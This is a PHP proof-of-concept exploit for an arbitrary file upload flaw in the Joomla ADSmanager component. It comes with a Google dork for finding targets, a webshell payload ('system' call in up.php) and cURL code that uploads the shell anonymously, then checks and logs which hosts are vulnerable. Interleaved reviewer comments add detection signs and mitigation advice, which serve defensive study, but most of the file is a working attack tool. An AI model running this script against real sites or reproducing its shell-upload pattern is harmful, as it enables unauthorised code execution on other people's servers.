<?php
/*
  # AUTHOR (DISCOVERY): Back-DOOR - https://fb.com/Backdoor.ma
  # REF: https://ghostbin.com/paste/metta , https://www.youtube.com/watch?v=4PqqBhD6ov4
  # Exploit Title: Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
  # TYPE: Arbitrary File Upload
  # Google DORK: inurl:/index.php?option=com_adsmanager"
  # EXPLOIT: /index.php?option=com_adsmanager&task=upload&tmpl=component
  # Tested on: Linux
  # EXECUTE: php exploit.php www.alvo.com.br
  # EXECUTE: php exploit.php www.alvo.com.br/pasta
  # OUTPUT: Exploit_AFU_Joomla.txt
  # FILE UPLOAD: up.jpg => code shell: <?php system('id'); ?>
  --------------------------------------------------------------------------------
  # AUTHOR (SCRIPT): Cleiton Pinheiro / Nick: googleINURL
  # EMAIL: inurlbr@gmail.com
  # Blog: http://blog.inurl.com.br
  # Twitter: https://twitter.com/googleinurl
  # Fanpage: https://fb.com/InurlBrasil
  # Pastebin http://pastebin.com/u/Googleinurl
  # GIT: https://github.com/googleinurl
  # PSS: http://packetstormsecurity.com/user/googleinurl
  # EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE: http://youtube.com/c/INURLBrasil
  # PLUS: http://google.com/+INURLBrasil
 */

// -----------------------------------------------------------------------------
// Reviewer notes (defensive reading of this proof of concept)
//
// What the code below does:
//   1. POSTs a multipart form to the com_adsmanager upload task, attaching the
//      local file up.jpg and asking for the server-side name "up.php".
//   2. Requests <argument>/tmp/plupload/up.php and prints the response headers.
//   3. Prints "[+] VULL" when "200" occurs in the status line(s) of step 2, and
//      appends the URL to Exploit_AFU_Joomla.txt when the upload response also
//      contains the marker '"tmpfile" : "up.php"'.
//
// The upload request carries no cookie, token or credentials, so a positive
// result implies the endpoint accepted an anonymous upload and kept a
// client-chosen ".php" name in a directory served over HTTP. The affected
// component version is not stated on this page.
//
// Detection (web server / WAF logs, file integrity monitoring):
//   - POST requests to index.php with option=com_adsmanager and task=upload in
//     the query string, especially unauthenticated ones.
//   - Multipart bodies whose "name" field ends in an executable extension while
//     the attached file claims to be an image.
//   - Script files appearing under tmp/plupload/, and HTTP requests for them.
//   - This script sets a Referer equal to the site base URL and sets no
//     User-Agent option on the cURL handle (presumably none is sent; confirm).
//   - On a workstation, Exploit_AFU_Joomla.txt in the working directory is an
//     artefact of this tool having been run there.
//
// Mitigation:
//   - Update the component to a fixed release or remove it if unused.
//   - Deny script execution in tmp/ and upload directories at the web server.
//   - Server side: choose the stored filename on the server, allow-list
//     extensions, and verify content rather than trusting the submitted name.
//
// Reading the output: the verdict reflects only the HTTP status of the
// follow-up request. A site that answers 200 for unknown paths yields a false
// positive, so confirm on the file system before treating a host as affected or
// as clean.
// -----------------------------------------------------------------------------

// Runtime setup for a long-running CLI script with unbuffered output.
error_reporting(1);               // level 1 == E_ERROR only
set_time_limit(0);                // no execution time limit
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);    // get_headers() below needs URL wrappers
ob_implicit_flush(true);          // flush after every output call
ob_end_flush();                   // flush and close the active output buffer

/**
 * Flush PHP's output buffer and the system write buffers.
 */
function __plus() {
    ob_flush();
    flush();
}

/**
 * Send the upload request, probe the expected file location and print a verdict.
 *
 * @param array $params 'host' => base URL of the site, 'cmd' => URL at which
 *                      the uploaded file is expected to be reachable.
 * @return void Results are echoed; a positive result is also appended to
 *              Exploit_AFU_Joomla.txt.
 */
function __request($params) {
    $objcurl = curl_init();
    // Upload endpoint of the component; tmpl=component is part of the fixed query string.
    curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/index.php?option=com_adsmanager&task=upload&tmpl=component");
    curl_setopt($objcurl, CURLOPT_POST, 1);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);                 // response headers are included in the returned body
    curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
    // Multipart form: "file" is the local up.jpg (legacy '@' prefix), "name" is the
    // filename the server is asked to store it under. The mismatch between the two
    // is the core of the issue and a useful detection signal.
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array("file" => "@up.jpg", "name" => "up.php"));
    // NOTE(review): certificate and hostname verification are disabled, so the
    // response is not authenticated when the target is reached over HTTPS.
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);         // curl_exec() returns the response as a string
    curl_setopt($objcurl, CURLOPT_FOLLOWLOCATION, 1);
    $info['corpo'] = curl_exec($objcurl);                     // "corpo" = body (headers + body, see CURLOPT_HEADER)
    $info['server'] = curl_getinfo($objcurl);                 // stored but not read anywhere in this function
    curl_close($objcurl);

    // Second request: fetch the headers of the URL where the file is expected.
    // NOTE(review): get_headers() returns false on failure; the loop and the
    // index accesses below do not check for that.
    $gh = get_headers($params['cmd'], 1);
    foreach ($gh as $key => $value) {
        echo " [INFO][{$key}]:: {$value}\n";
    }
    // Numeric keys hold the status line(s); index 1 is only set when more than
    // one response was received. Any occurrence of "200" counts as success.
    $_x = (strstr(($gh[0] . (isset($gh[1]) ? $gh[1] : NULL)), '200'));
    echo "--------------------------------------------------------------\n";
    print " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : "[-] NOT VULL\n");
    // The upload response is checked separately for the marker naming the stored file.
    if (strstr($info['corpo'], '"tmpfile" : "up.php"')) {
        // file_put_contents() returns the number of bytes written, which is
        // concatenated onto the printed URL.
        print "\n [INFO][URL][SHELL]:: " . (!empty($_x) ? "[+] {$params['cmd']}" . file_put_contents("Exploit_AFU_Joomla.txt", "{$params['cmd']}\n\n", FILE_APPEND) : '[-] ERROR!');
        // Printed whenever the marker is present, independent of the status check.
        print "\n [INFO] Successfully Upload!\n";
    }
    echo "--------------------------------------------------------------\n";
}

// Entry point: the site is taken from the first command-line argument.
echo "\n [+] Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability\n\n";
$params = array(
    // URL probed after the upload, built from the raw argument.
    'cmd' => "{$argv[1]}/tmp/plupload/up.php",
    // Base URL: "http://" is prepended unless the argument contains "http"
    // anywhere; without an argument the script exits with an error message.
    'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n"));
// Both calls run for their side effects; the concatenated result is discarded.
__request($params) . __plus();